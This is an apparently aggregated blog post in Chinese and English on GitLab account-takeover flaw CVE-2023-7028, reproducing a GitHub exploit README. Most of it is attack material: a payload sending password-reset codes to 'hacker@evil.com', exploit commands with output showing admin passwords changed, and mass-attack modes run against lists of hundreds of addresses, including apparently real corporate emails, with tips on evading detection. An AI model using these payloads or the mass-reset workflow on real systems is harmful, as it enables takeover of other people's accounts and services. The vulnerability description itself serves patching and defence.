GitLab Account-Take-Over Vulnerability

漏洞信息

漏洞名称: GitLab Account-Take-Over Vulnerability

漏洞编号:

  • CVE: CVE-2023-7028

漏洞类型: 权限绕过

漏洞等级: 高危

漏洞描述: GitLab是一个广泛使用的开源代码托管和协作平台,支持团队进行版本控制和持续集成/持续部署(CI/CD)。它被广泛应用于企业级服务、软件开发团队和教育机构中,因其强大的功能和灵活性而受到开发者的青睐。CVE-2023-7028是一个账户接管漏洞,允许攻击者无需用户交互即可控制GitLab管理员账户。该漏洞的核心在于密码重置过程中的电子邮件管理。攻击者可以提供两个电子邮件地址,重置代码将被发送到这两个地址。因此,攻击者可以同时提供目标账户的电子邮件地址和自己的电子邮件地址,从而重置管理员密码。值得注意的是,GitLab指出,双因素认证(2FA)可以防止此漏洞被利用,因为即使攻击者重置了密码,也无法登录。此漏洞由asterion04发现,并在GitLab的多个版本中存在。该漏洞的利用可能导致严重的安全风险,包括但不限于账户被完全控制、敏感数据泄露以及服务中断。攻击者可以利用此漏洞进行自动化攻击,且无需任何形式的认证,极大地增加了其危害性。

产品厂商: GitLab

产品名称: GitLab

影响版本: 16.1 <= version <= 16.1.5, 16.2 <= version <= 16.2.8, 16.3 <= version <= 16.3.6, 16.4 <= version <= 16.4.4, 16.5 <= version <= 16.5.5, 16.6 <= version <= 16.6.3, 16.7 <= version <= 16.7.1

来源: https://github.com/szybnev/CVE-2023-7028

类型: CVE-2023:github search

仓库文件

  • .gitignore
  • CVE-2023-7028.py
  • README.md

来源概述

CVE-2023-7028 | Account-Take-Over Gitlab

Disclamer

This code is a proof of concept of the vulnerability, I’m not pushing anyone to use it on gitlab instances they don’t own.
This tool has been developed for research and educational purposes only and I will not be held responsible for any use you may make of it.

Description

THIS IS FORK OF REPO https://github.com/Vozec/CVE-2023-7028. I am only improve exploit usage.

CVE-2023-7028 refers to an Account-Take-Over vulnerability that allows users to take control of the gitlab administrator account without user interaction.

The vulnerability lies in the management of emails when resetting passwords. An attacker can provide 2 emails and the reset code will be sent to both.
It is therefore possible to provide the e-mail address of the target account as well as that of the attacker, and to reset the administrator password.
(Gitlab points out that 2-factor authentication prevents this vulnerability from being exploited, since an attacker, even after resetting the password, will not be able to log in.)

This vulnerability was discovered by asterion04

Payload

Here’s an example payload

1
user[email][]=my.target@example.com&user[email][]=hacker@evil.com

POC

Method 1: Using temp email (single target)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com

[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: 6grp7ert9y@laafd.com
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = bc91lpzwTOaY9dg5SWjLvvDDb61j6ZunCX4DXYlSnWz9Y3zK35SPiLNShhrDrPVDgY_AzQjzpD5qVt2WXeolog
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
[DEBUG] Waiting mail, sleeping for 7.5 seconds
[DEBUG] Getting link using temp-mail | Try N°1 on 5
[DEBUG] Getting last mail for 6grp7ert9y@laafd.com
[DEBUG] 1 mail(s) found
[DEBUG] Reading the last one
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = RN6gypVz7Zxtu2zRsJmKPsDHNumIH_UPvdn7aQoWRBnUcqmW1hcu8kYcMvI6XbTDsYuZieMFypbe8SWi3q781w
[DEBUG] Changing password to l3mG2v2XN4UBzbN18ZkW
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: my.target@example.com
        Password: l3mG2v2XN4UBzbN18ZkW

Method 2: Using evil email (single target)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t my.target@example.com -e hacker@evil.com

[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = 1Yt1EUeWSL-oiSV7v1Z6ghdCDG3w0FFCQB8Uc5B5GAodVNJ26OlPT8HtYYleGXB9F0otas3gnHOtRfhFall8pQ
[DEBUG] Sending reset password request
[DEBUG] Emails sended to my.target@example.com and hacker@evil.com !
        Input link received by mail: https://gitlab.example.com/users/password/edit?reset_password_token=U8PSU7DXdebdTD3GjMiX
[DEBUG] Generating new password
[DEBUG] Getting authenticity_token ...
[DEBUG] authenticity_token = N7gs43C9ZMxdniA9UEzzfH2Rlhgejt75M1Kw88vaarP_Z4uE38JjPDT6ZM-xA_mDfZm3HyO-E8jeCFzFMfoOHA
[DEBUG] Changing password to EU7XIYjlawjb5tH2jgmU
[DEBUG] CVE_2023_7028 succeed !
        You can connect on https://gitlab.example.com/users/sign_in
        Username: my.target@example.com
        Password: EU7XIYjlawjb5tH2jgmU

Method 3: Using email list from file

1
2
3
4
5
6
7
8
9
10
11
12
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting full attacks on 806 target(s) with rate limit 10 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Getting temporary mail
[DEBUG] Scrapping available domains on 1secmail.com
[DEBUG] 8 domains found
[DEBUG] Temporary mail: abc123xyz@laafd.com
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
...
[DEBUG] Attack completed: 800/806 requests sent, 750/806 passwords reset

Method 4: Skip mode - only send reset requests (faster)

1
2
3
4
5
6
7
8
9
10
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l emails.txt --skip -rps 20

[DEBUG] Loaded 806 emails from emails.txt
[DEBUG] Starting reset requests on 806 target(s) with rate limit 20 rps
[DEBUG] Processing target 1/806: vkuzmina@korusconsulting.ru
[DEBUG] Reset request sent successfully for vkuzmina@korusconsulting.ru
[DEBUG] Processing target 2/806: mromanenko@korusconsulting.ru
[DEBUG] Reset request sent successfully for mromanenko@korusconsulting.ru
...
[DEBUG] Reset requests completed: 800/806 successful

Help

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
$ python3 ./CVE-2023-7028.py -h
usage: CVE-2023-7028.py [-h] -u URL (-t TARGET | -l EMAIL_LIST) [-e EVIL] [-p PASSWORD] [--skip] [-rps RATE_LIMIT]

This tool automates CVE-2023-7028 on gitlab

optional arguments:
-h, --help show this help message and exit
-u URL, --url URL Gitlab url
-t TARGET, --target TARGET
Target email
-l EMAIL_LIST, --list EMAIL_LIST
File with target emails list
-e EVIL, --evil EVIL Evil email
-p PASSWORD, --password PASSWORD
Password
--skip Skip password reset, only send reset requests
-rps RATE_LIMIT, --rate RATE_LIMIT
Requests per second (default: 10)

Usage Notes

  • Single target: Use -t parameter to attack single email address
  • Multiple targets: Use -l parameter to load email addresses from file (one per line)
  • Evil email: Without --evil option, script uses public temp-mail to find reset link (be careful during pentests)
  • Skip mode: Use --skip to only send reset requests without waiting for password reset (faster for mass attacks)
  • Rate limiting: Use -rps to control requests per second (default: 10). Higher values = faster but more detectable
  • Email list format: Plain text file with one email per line

Examples

1
2
3
4
5
6
7
8
## Single target with custom password
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -t admin@example.com -p MyCustomPass123

## Mass attack with slower rate limit
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt -rps 5

## Fast reconnaissance - only send reset requests
python3 ./CVE-2023-7028.py -u https://gitlab.example.com/ -l targets.txt --skip -rps 50

Versions concerned

  • 16.1 to 16.1.5
  • 16.2 to 16.2.8
  • 16.3 to 16.3.6
  • 16.4 to 16.4.4
  • 16.5 to 16.5.5
  • 16.6 to 16.6.3
  • 16.7 to 16.7.1

References

Github Poc
#权限绕过 #CVE-2023:github search
GitLab Account-Take-Over Vulnerability
http://example.com/2025/07/21/github_1610417089/
作者
lianccc
发布于
2025年7月21日
许可协议